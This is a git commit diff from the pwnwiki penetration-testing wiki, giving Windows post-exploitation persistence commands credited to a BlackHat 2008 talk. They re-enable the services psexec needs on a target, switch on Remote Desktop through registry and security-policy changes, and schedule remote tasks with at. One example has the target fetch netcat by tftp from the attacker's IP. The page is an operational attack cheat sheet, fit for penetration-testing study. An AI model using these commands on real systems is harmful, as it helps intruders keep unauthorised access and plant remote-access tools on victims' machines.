weyne/pwnwiki.github.io
1
0
Fork 0
mirror of https://github.com/oXis/pwnwiki.github.io.git synced 2025-10-29 16:56:59 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #55 from pwnwiki/ames

Browse Source 
Finished with Ames content.
This commit is contained in:
Glenn Barrett 2013-12-30 20:00:15 -08:00
commit f33d876350
1 changed files with 10 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
persistence/windows/general.md
View File

@ -17,14 +17,15 @@ Commands to run to maintain persistence after you have exploited it and are usua
### Enable `psexec` ### Enable `psexec`
The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below. The [`psexec` tool](http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx) executes processes on other systems over a network. Most systems now disable the "clipbook" which `psexec` required. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 50)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can re-enable the sub-systems needed to use `psexec` using the `sc` commands below.
``c:\> net use \\[TargetIP]\ipc$ username /user:password <pre>
c:\> net use \\[TargetIP]\ipc$ username /user:password
c:\> sc \\[TargetIP] config netdde start= auto c:\> sc \\[TargetIP] config netdde start= auto
c:\> sc \\[TargetIP] config netddedsdm start= auto c:\> sc \\[TargetIP] config netddedsdm start= auto
c:\> sc \\[TargetIP] config clipsrv start= auto c:\> sc \\[TargetIP] config clipsrv start= auto
c:\> sc \\[TargetIP] start netdde c:\> sc \\[TargetIP] start netdde
c:\> sc \\[TargetIP] start netddedsdm c:\> sc \\[TargetIP] start netddedsdm
c:\> sc \\[TargetIP] start clipsrv c:\> sc \\[TargetIP] start clipsrv
`` </pre>
### Enable Remote Desktop ### Enable Remote Desktop
Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 53)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely enable remote desktop using the commands below. Remote Desktop allows a remote user to receive a graphical "desktop" of the target (compromised) system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 53)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely enable remote desktop using the commands below.
@ -57,20 +58,22 @@ Remote Desktop allows a remote user to receive a graphical "desktop" of the targ
1. On the remote system, execute the following commands: 1. On the remote system, execute the following commands:
``c:\> sc config termservice start= auto sc config termservice start= auto <pre>c:\> sc config termservice start= auto sc config termservice start= auto
c:\> regedit /s enable_ts.reg c:\> regedit /s enable_ts.reg
c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb
c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb c:\> copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb
c:\> secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini c:\> secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini
c:\> gpupdate /Force c:\> gpupdate /Force
c:\> net start "terminal services" c:\> net start "terminal services"
`` </pre>
### Scheduler ### Scheduler
The [Windows scheduler](http://support.microsoft.com/kb/313565) can be used to further compromise a system. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 58)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely schedule tasks using the commands below. The [Windows scheduler](http://support.microsoft.com/kb/313565) can be used to further compromise a system. It usually runs at the SYSTEM account privilege level. According to Val Smith's and Colin Ames' [BlackHat 2008 presentation (page 58)](http://www.blackhat.com/presentations/bh-usa-08/Smith_Ames/BH_US_08_Smith_Ames_Meta-Post_Exploitation.pdf), you can remotely schedule tasks using the commands below.
``c:\> net use \\[TargetIP]\ipc$ password /user:username <pre>
c:\> net use \\[TargetIP]\ipc$ password /user:username
c:\> at \\[TargetIP] 12:00 pm command c:\> at \\[TargetIP] 12:00 pm command
`` </pre>
An example you might run on the remote system might be: `at \\192.168.1.1 12:00pm tftp -I [MyIP] GET nc.exe` An example you might run on the remote system might be: `at \\192.168.1.1 12:00pm tftp -I [MyIP] GET nc.exe`